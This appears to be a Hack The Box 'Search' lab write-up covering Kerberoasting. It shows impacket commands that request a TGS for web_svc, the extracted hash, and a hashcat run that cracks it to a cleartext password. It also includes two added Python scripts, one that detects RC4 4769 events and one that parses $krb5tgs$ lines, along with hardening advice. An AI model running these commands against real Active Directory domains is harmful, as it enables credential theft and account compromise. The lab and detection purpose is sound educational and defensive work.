Kerberoasting


During the BloodHound enumeration, the web_svc account was identified as vulnerable to Kerberoasting.

Kerberoasting is an attack in which an adversary targets service tickets issued by the Key Distribution Center (KDC) in a Kerberos authentication system. Any authenticated domain user can request a service ticket for any account that has a Service Principal Name (SPN); the attacker requests tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline to recover the plaintext credential. The attack takes advantage of the weak encryption used to protect service tickets: the ticket is encrypted with a key derived from the service account's password, and when the KDC issues it with RC4-HMAC (etype 23) a weak password can be guessed offline at high speed, enabling the adversary to compromise the account.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=hope.sharp@research.search.htb.ccache impacket-GetUserSPNs SEARCH.HTB/hope.sharp@research.search.htb -no-pass -k -dc-ip $IP -dc-host research.search.htb -request-user web_svc
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
 
ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
research/web_svc.search.htb:60001  web_svc            2020-04-09 14:59:11.329031  <never>               
 
 
 
$krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*$e71d74f33d3c52ca92e68177c73630f3$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

Using the TGT of the hope.sharp user, I am able to authenticate to the target KDC and Kerberoast the web_svc account, effectively extracting the TGS hash. The SPN is research/web_svc.search.htb:60001.
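From the defender's side, the request above leaves a trace on the domain controller: Windows Security event 4769 (a Kerberos service ticket was requested) records the requesting user, the service name and the ticket encryption type, and an RC4 (0x17) ticket for a user-account SPN is the classic Kerberoasting signal. The following script is an added example, not part of this writeup or of any tool it uses; it runs detection logic over constructed 4769 events flattened to key=value pairs (the requester, the sql_svc service, IPs and statuses are all made up) and reports requesters that pulled RC4 tickets for non-machine, non-krbtgt services.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 data."""
import re
from collections import Counter

RC4_HMAC = 0x17  # TicketEncryptionType for etype 23 (RC4-HMAC); hashcat mode 13100

# Constructed sample events (not real logs): 4769 lines flattened to key=value.
# sql_svc, the IP addresses and the failed request are hypothetical.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=web_svc "
    "TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=RESEARCH$ "
    "TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=jane.doe@SEARCH.HTB ServiceName=krbtgt "
    "TicketEncryptionType=0x17 TicketOptions=0x60810010 IpAddress=::ffff:192.168.50.7 Status=0x0",
    "EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=sql_svc "
    "TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4768 TargetUserName=hope.sharp ServiceName=krbtgt "
    "TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=bob@SEARCH.HTB ServiceName=web_svc "
    "TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.14.9 Status=0x1B",
]

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one flattened key=value event line into a dict of string values."""
    return dict(_KV.findall(line))


def is_rc4_service_ticket(ev):
    """True for a successful 4769 that issued an RC4-encrypted ticket for a
    service principal that is neither a machine account (name ends in $) nor krbtgt."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    try:
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
    except ValueError:
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return etype == RC4_HMAC


def find_kerberoast_candidates(lines, threshold=1):
    """Return (flagged events, {requester: count}) for requesters at or above threshold.
    A single RC4 ticket for a user-account SPN is already worth a look in an
    AES-only domain; a burst from one requester is the Kerberoasting pattern."""
    flagged = [ev for ev in map(parse_event, lines) if is_rc4_service_ticket(ev)]
    per_requester = Counter(ev["TargetUserName"] for ev in flagged)
    suspects = {user: n for user, n in per_requester.items() if n >= threshold}
    return flagged, suspects


if __name__ == "__main__":
    events, suspects = find_kerberoast_candidates(SAMPLE_EVENTS, threshold=2)
    for ev in events:
        print(f"RC4 TGS  requester={ev['TargetUserName']}  service={ev['ServiceName']}  "
              f"src={ev['IpAddress']}")
    for user, n in suspects.items():
        print(f"suspect: {user} requested {n} RC4 service tickets")
```

In production the same filter is expressed as a SIEM query over the real 4769 fields; the two things that cut the noise are excluding machine accounts and krbtgt, and keying the count on the requester rather than the service. Setting the service account's msDS-SupportedEncryptionTypes to AES only (and choosing a long random password) removes the etype 23 tickets this logic looks for.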

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ hashcat --show web_svc.hash
 
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
 
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ hashcat -a 0 -m 13100 web_svc.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*$e71d74f33d3c52ca92e68177c73630f3$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:@3ONEmillionbaby
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*...217d33
Time.Started.....: Tue Jan 30 16:47:20 2024 (5 secs)
Time.Estimated...: Tue Jan 30 16:47:25 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2687.4 kH/s (1.68ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11493376/14344386 (80.12%)
Rejected.........: 0/11493376 (0.00%)
Restore.Point....: 11485184/14344386 (80.07%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: @m0rcit0 -> <div><embed src="http://apps.rockyou.com/fxtext.swf?ID=34063538&nopanel=true&stage=true" quality="high"  scale="noscale" width="526.17" height="120.8375" wmode="transparent" name="rockyou" type="application/x-shockwave-flash" pluginspage="http://www.macro
Hardware.Mon.#1..: Util: 66%
 
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Tue Jan 30 16:47:19 2024
Stopped: Tue Jan 30 16:47:26 2024

hashcat cracked the TGS ticket. The cracked password is @3ONEmillionbaby. Validation will be made by requesting a TGT.
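hashcat identified the line as mode 13100 from its `$krb5tgs$23$` prefix. The parser below is an added example, not code from this writeup, impacket or hashcat; it pulls the fields out of a TGS-REP line (etype, account, realm, SPN, checksum, encrypted ticket data) and maps the etype to the hashcat mode, which is handy when triaging a hash file found on a host. The sample line reuses the account, realm and checksum shown above but the encrypted ticket data is a constructed hex string; the etype 17/18 layout follows hashcat's example hashes for modes 19600/19700, which carry no SPN field.

```python
"""Parse $krb5tgs$ TGS-REP lines and report etype and hashcat mode."""
import re

# hashcat modes, etype names and checksum sizes for the etypes seen in $krb5tgs$ lines
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAME = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
CHECKSUM_BYTES = {23: 16, 17: 12, 18: 12}  # HMAC-MD5 vs HMAC-SHA1-96
_HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample: prefix and checksum as in the hash above, edata made up.
SAMPLE_HASH = ("$krb5tgs$23$*web_svc$SEARCH.HTB$SEARCH.HTB/web_svc*"
               "$e71d74f33d3c52ca92e68177c73630f3$" + "ab" * 40)


def parse_krb5tgs(line):
    """Split a $krb5tgs$ line into its fields and validate the hex parts."""
    line = line.strip()
    prefix = "$krb5tgs$"
    if not line.startswith(prefix):
        raise ValueError("not a $krb5tgs$ line")
    etype_s, _, body = line[len(prefix):].partition("$")
    etype = int(etype_s)
    if etype not in HASHCAT_MODE:
        raise ValueError(f"unsupported etype {etype}")
    if etype == 23:
        # $krb5tgs$23$*user$realm$spn*$checksum$edata
        if not body.startswith("*"):
            raise ValueError("etype 23 line lacks the *user$realm$spn* block")
        end = body.index("*$", 1)
        user, realm, spn = body[1:end].split("$", 2)
        checksum, _, edata = body[end + 2:].partition("$")
    else:
        # $krb5tgs$17$user$realm$checksum$edata (hashcat example layout; no SPN)
        user, realm, checksum, edata = body.split("$", 3)
        spn = None
    for name, value in (("checksum", checksum), ("edata", edata)):
        if not _HEX.match(value):
            raise ValueError(f"{name} field is not hex")
    if len(checksum) != 2 * CHECKSUM_BYTES[etype]:
        raise ValueError("checksum length does not match etype")
    return {
        "etype": etype,
        "etype_name": ETYPE_NAME[etype],
        "hashcat_mode": HASHCAT_MODE[etype],
        "user": user,
        "realm": realm,
        "spn": spn,
        "checksum_bytes": len(checksum) // 2,
        "edata_bytes": len(edata) // 2,
        # etype 23 keys the ticket with the NT hash, the cheap-to-guess case
        "rc4_ticket": etype == 23,
    }


if __name__ == "__main__":
    info = parse_krb5tgs(SAMPLE_HASH)
    print(f"{info['user']}@{info['realm']} spn={info['spn']} "
          f"etype={info['etype']} ({info['etype_name']}) hashcat -m {info['hashcat_mode']}")
```

The `rc4_ticket` flag is the triage signal: an etype 23 line means the KDC still issues RC4 tickets for that account, which is the condition that makes the offline guess shown above feasible at millions of candidates per second.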